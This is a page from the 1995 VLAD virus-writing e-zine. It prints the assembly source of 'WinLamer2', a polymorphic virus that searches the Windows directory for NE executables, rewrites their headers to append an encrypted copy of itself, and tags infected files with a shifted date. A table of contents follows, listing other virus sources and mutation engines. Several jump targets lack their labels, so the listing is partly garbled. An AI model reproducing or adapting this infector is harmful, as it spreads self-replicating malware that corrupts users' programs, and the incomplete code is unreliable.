Virus Labs & Distribution
VLAD #5 - Winlamer2

;       WinLamer2 by burglar (C)Copyright June, 1995. All rights reserved.
;       Using TASM v4.0...

        .MODEL  TINY

        push    ds
        push    es

        mov     ax,1686h        ;is dpmi available ?
        int     2fh
        or      ax,ax
        jz      dpmi_exist
        pop     es
        pop     ds

        DB      0eah
relocIP DW      0
relocCS DW      0ffffh

;       initial period... allocate a mem block using dpmi...

        mov     ax,0501h        ;allocate mem block.
        mov     cx,0ffffh
        xor     bx,bx
        int     31h
        push    si              ;mem handle.
        push    di
        push    bx              ;32 bits linear address.
        push    cx

        xor     ax,ax           ;allocate LDT descriptor.
        mov     cx,1
        int     31h

        mov     bx,ax           ;set segment base address.
        mov     ax,7
        pop     dx
        pop     cx
        int     31h

        mov     ax,8            ;set segment limit.
        mov     dx,0ffffh
        xor     cx,cx
        int     31h

        mov     ax,9
        mov     cl,11110010b    ;r/w data segment.
        xor     ch,ch
        int     31h

        mov     ds,bx           ;selector.

        pop     [z.mem_hnd+2]   ;mem handle.
        pop     [z.mem_hnd]

;       ok! above code has allocated a 64k-1 mem block...

        call    adj
        pop     ax
        sub     ax,OFFSET adj
        mov     [z._base],ax

;       now, search .EXE files to infect...

        mov     ah,2fh          ;get current DTA...
        int     21h
        mov     [z.DTA],bx
        mov     [z.DTA+2],es

        mov     si,OFFSET cur_dir       ;get current dir...
        xor     dl,dl
        mov     ah,47h
        int     21h

        mov     dx,OFFSET win_path      ;set current dir to \Windows...
        add     dx,[z._base]
        push    ds
        push    cs
        pop     ds
        mov     ah,3bh
        int     21h
        pop     ds

        mov     ah,4eh          ;search first .EXE...
        xor     cx,cx
        mov     dx,OFFSET wild_exe
        add     dx,[z._base]
        push    ds              ;keep selector...
        push    cs
        pop     ds
        int     21h
        pop     ds
        jnc     found_exe

        call    free

        jmp     exit

        mov     ah,3eh                  ;close file...
        int     21h

        mov     ah,4fh                  ;search next...
        int     21h
        jnc     found_exe

        mov     dx,OFFSET cur_dir       ;restore current dir...
        mov     ah,3bh
        int     21h

        call    free

        jmp     exit

;       found .EXE file, infect it if it is a Win prog and it hasn't infected.

        push    ds
        lds     si,DWORD PTR [z.DTA]
        cmp     WORD PTR [si+18h],0c800h        ;already infected ?!
        jb      chk_MZ_NE
        pop     ds
        jmp     close_exe

        lea     dx,[si+1eh]                     ;open file...
        mov     ax,3d02h
        int     21h

        pop     ds                              ;read old style header...
        mov     dx,OFFSET old_hdr
        mov     bx,ax
        mov     cx,40h
        mov     ah,3fh
        int     21h

        cmp     WORD PTR [z.old_hdr],'ZM'       ;.exe file ?!
        jne     close_exe
        cmp     [z.old_hdr+18h],WORD PTR 40h
        jb      close_exe
        mov     dx,WORD PTR [z.old_hdr+3ch]
        mov     cx,WORD PTR [z.old_hdr+3eh]
        mov     ax,4200h
        int     21h

        mov     dx,OFFSET new_hdr               ;read new style header...
        mov     cx,40h
        mov     ah,3fh
        int     21h

        cmp     WORD PTR [z.new_hdr],'EN'       ;New Executable file ?!
        jne     close_exe
        mov     al,[z.new_hdr+36h]
        and     al,2
        jz      close_exe

;       ok! the .EXE can be infected... let's infect it!

        sub     WORD PTR [z.old_hdr+10h],8
        sub     WORD PTR [z.old_hdr+3ch],8
        sbb     WORD PTR [z.old_hdr+3eh],0
        add     WORD PTR [z.new_hdr+4],8
        add     WORD PTR [z.new_hdr+24h],8
        add     WORD PTR [z.new_hdr+26h],8
        add     WORD PTR [z.new_hdr+28h],8
        add     WORD PTR [z.new_hdr+2ah],8

        push    WORD PTR [z.new_hdr+14h]        ;original IP...
        pop     [z.host_ip]
        push    WORD PTR [z.new_hdr+16h]        ;original CS number...
        pop     [z.host_cs]

        mov     WORD PTR [z.new_hdr+14h],0      ;new IP...
        inc     WORD PTR [z.new_hdr+1ch]
        push    WORD PTR [z.new_hdr+1ch]
        pop     WORD PTR [z.new_hdr+16h]        ;new CS number...

        xor     cx,cx                   ;lseek to start of file...
        xor     dx,dx
        mov     ax,4200h
        int     21h

        mov     dx,OFFSET old_hdr       ;write old style header...
        mov     cx,40h
        mov     ah,40h
        int     21h

        mov     dx,WORD PTR [z.old_hdr+3ch]     ;lseek to start of new header...
        mov     cx,WORD PTR [z.old_hdr+3eh]
        mov     ax,4200h
        int     21h

        mov     dx,OFFSET new_hdr       ;write new executable header...
        mov     cx,40h
        mov     ah,40h
        int     21h

        xor     cx,cx                   ;lseek down by 8 bytes...
        mov     dx,8
        mov     ax,4201h
        int     21h

        mov     dx,OFFSET temp
        mov     cx,WORD PTR [z.new_hdr+1ch]
        dec     cx
        shl     cx,3
        push    cx                      ;seg table length...
        mov     ah,3fh
        int     21h

        pop     dx
        push    dx
        add     dx,8
        neg     dx
        mov     cx,-1
        mov     ax,4201h
        int     21h

        mov     dx,OFFSET temp
        pop     cx
        mov     ah,40h
        int     21h

        xor     cx,cx
        xor     dx,dx
        mov     ax,4201h
        int     21h

        push    dx
        push    ax

        xor     cx,cx                   ;get file length...
        xor     dx,dx
        mov     ax,4202h
        int     21h

        push    dx                      ;file length...
        push    ax

        mov     cx,WORD PTR [z.new_hdr+32h]     ;alignment shift count...
        mov     ax,1
        shl     ax,cl                   ;logical sector length...
        mov     [z.log_sec_len],ax
        mov     cx,ax
        pop     ax
        pop     dx
        div     cx
        or      dx,dx                   ;any remainder?!
        jz      no_rmd
        inc     ax
;       ax=logical-sector offset...

        mov     [z.log_sec_ofs],ax

        mov     si,[z._base]
        push    ds
        pop     es
        push    cs
        pop     ds
        mov     di,OFFSET temp
        mov     cx,OFFSET PMEW_END
rep     movsb
        push    es
        pop     ds
        mov     si,OFFSET temp
        mov     WORD PTR [si+relocIP],0
        mov     WORD PTR [si+relocCS],0ffffh

        mov     si,OFFSET temp
        mov     di,8000h
        mov     [z.rlc_inf],1                   ;one relocatable item...
        mov     [z.rlc_inf+2],OFFSET relocIP
        mov     ax,OFFSET rlc_inf
        push    ds
        pop     dx
        mov     cx,OFFSET PMEW_END

        call    PMEW

        mov     [z.poly_len],cx

        add     cx,OFFSET PMEW_END
        push    [z.log_sec_ofs]
        pop     [z.my_seg_entry]
        mov     [z.my_seg_entry+2],cx
        mov     [z.my_seg_entry+4],180h
        mov     [z.my_seg_entry+6],cx

        pop     dx
        pop     cx
        mov     ax,4200h
        int     21h

        mov     dx,OFFSET my_seg_entry  ;write virii seg tbl entry...
        mov     cx,8
        mov     ah,40h
        int     21h

        mov     ax,[z.log_sec_ofs]
        mov     cx,[z.log_sec_len]
        mul     cx
        mov     cx,dx
        mov     dx,ax
        mov     ax,4200h
        int     21h

        mov     dx,8000h                ;write virii body...
        mov     cx,[z.poly_len]
        add     cx,OFFSET PMEW_END
        mov     ah,40h
        int     21h

        mov     WORD PTR [z.reloc_data],1
        mov     BYTE PTR [z.reloc_data+2],3
        mov     BYTE PTR [z.reloc_data+3],4
        push    [z.poly_len]
        pop     WORD PTR [z.reloc_data+4]
        add     WORD PTR [z.reloc_data+4],OFFSET relocIP

        mov     dx,OFFSET reloc_data    ;write relocation item...
        mov     cx,10
        mov     ah,40h
        int     21h

        push    ds
        lds     si,DWORD PTR [z.DTA]  ;add date to 100 years...
        mov     cx,[si+16h]
        mov     dx,[si+18h]
        add     dx,0c800h
        mov     ax,5701h
        int     21h
        pop     ds

        jmp     close_exe               ;continue to infect...

free    PROC    NEAR
        mov     ax,0502h                ;free mem block...
        mov     si,[z.mem_hnd]
        mov     di,[z.mem_hnd+2]
        int     31h

free    ENDP

wild_exe        DB      '*.EXE',0
win_path        DB      '\WINDOWS',0
copr            DB      'WinLamer2 '
                DB      '(C)Copyright Aug, 1995 by Burglar in Taipei, Taiwan.'


var             STRUC
_base           DW      ?
mem_hnd         DW      ?
                DW      ?
DTA             DW      ?
                DW      ?
old_hdr         DB      40h dup (?)
new_hdr         DB      40h dup (?)
log_sec_len     DW      ?
cur_dir         DB      64 dup (?)
poly_len        DW      ?
log_sec_ofs     DW      ?
my_seg_entry    DW      ?
                DW      ?
                DW      ?
                DW      ?
reloc_data      DW      ?
                DB      ?
                DB      ?
                DW      ?
host_cs         DW      ?
host_ip         DW      ?
rlc_inf         DW      ?
                DW      ?
temp            DB      ?
var             ENDS




ARTICLE.1_2       Aims and Policies
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ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag


ARTICLE.2_2       Neuroquila disasm
ARTICLE.2_3       Uruguay#3 disasm
ARTICLE.2_4       Immortal Riot
ARTICLE.2_5       Fog.doc
ARTICLE.2_6       Fog.asm
ARTICLE.2_7       AP-Poly


Dying Oath
ARTICLE.3_2       Win API tutorial
ARTICLE.3_3       Poly primer
ARTICLE.3_4       NoMut v0.01
ARTICLE.3_5       Demon3b
ARTICLE.3_6       SDFEe20 source
ARTICLE.3_7       ZL 2.0 source


Virus Descriptions
ARTICLE.4_2       Horsa
ARTICLE.4_3       Ph33r
ARTICLE.4_4       Wintiny
ARTICLE.4_5       Midnight
ARTICLE.4_6       Arme Stoevlar
ARTICLE.4_7       Small Virus


ARTICLE.5_2       Winlamer2
ARTICLE.5_3       Lady Death
ARTICLE.5_4       H8urNMEs
ARTICLE.5_5       Sepboot
ARTICLE.5_6       Fame
ARTICLE.5_7       Int Patch

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